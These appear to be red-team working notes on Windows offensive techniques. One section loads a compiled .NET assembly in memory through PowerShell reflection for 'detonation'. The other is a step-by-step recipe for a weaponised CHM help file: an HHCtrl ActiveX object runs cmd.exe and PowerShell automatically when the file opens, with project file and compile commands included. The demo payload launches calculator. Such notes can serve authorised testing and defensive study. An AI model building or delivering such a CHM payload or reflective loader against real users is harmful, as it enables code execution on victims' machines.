Windows Specific
.NET PowerShell Reflection
ARRFFG
.NET Version
If you are trying to detonate in an environment using PowerShell <5 (Most companies are only going to be using standard powershell) you MUST make sure that theΒ output/resulting binary targets a lower/longlife version of .NET. For instance, net48/net4.0.
If you do not, PowerShell will fail to load the assemblies and you will have NO idea why. Use net4.8.
1. Download the 4.8 SDK:
2. Change the .csproj
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net48</TargetFramework>
</PropertyGroup>
</Project>Remove the auto imports and the nullable fields, these will throw errors.
3. Compile
dotnet build --self-contained true /p:PublishSingleFile=true4. You can now use reflection in most environments.
PS > $k = [IO.file]::ReadAllBytes("ABS_PATH")
PS > b = [Reflection.Assembly]::Load($k)
PS > b.GetTypes()
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True False Constants System.Object
True False Program System.Object
PS C:\Users\vacod\source\repos\ConsoleApp1\ConsoleApp1> [Test.Constants]::k
12COM
Component Object Models
References
- https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal
- https://en.wikipedia.org/wiki/Component_Object_Model
- https://learn.microsoft.com/en-us/windows/win32/com/com-fundamentals
- https://learn.microsoft.com/en-us/dotnet/csharp/advanced-topics/interop/
- https://learn.microsoft.com/en-us/windows/win32/com/the-component-object-model
CHM
Creating a CHM can be done using the Free Pascal Compiler or Ide on Linux
sudo apt-get install fp-ide
sudo apt-get install fp-compilerThe CHM can be compiled using the installed 'chmcmd' program.
Guide
Thanks, Copilot:
π Step-by-Step Guide
Make Content
MyHelpProject/
βββ index.html
βββ topic1.html
βββ topic2.html
βββ styles.css
βββ images/
βββ example.pngEmbed a Payload
<html>
<body>
Hello world
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command C:\Windows\System32\calc.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>Create the Project (.hhp file)Β
Note the following reference on the format
[OPTIONS]
Title=CHM
Default topic=file1.htm
Compiled file=chm.chm
Index file=index.htm
[FILES]
index.htm
file1.htmCompile
chmcmd project.hhpThis will produce project.chm.
On Linux, you may need libchm or chmcmd compiled with support for it.
References:
- https://wiki.freepascal.org/htmlhelp_compiler
- https://www.nongnu.org/chmspec/latest/
- https://learn.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/creating-a-project-file
- https://www.alexthayer.com/UsingHHPFiles.pdf
- https://medium.com/r3d-buck3t/weaponize-chm-files-with-powershell-nishang-c98b93f79f1e
- https://www.forcepoint.com/blog/x-labs/microsoft-compiled-html-help-threat
- https://github.com/v4resk/red-book/blob/main/redteam/weapon/code-execution/html-help-files.md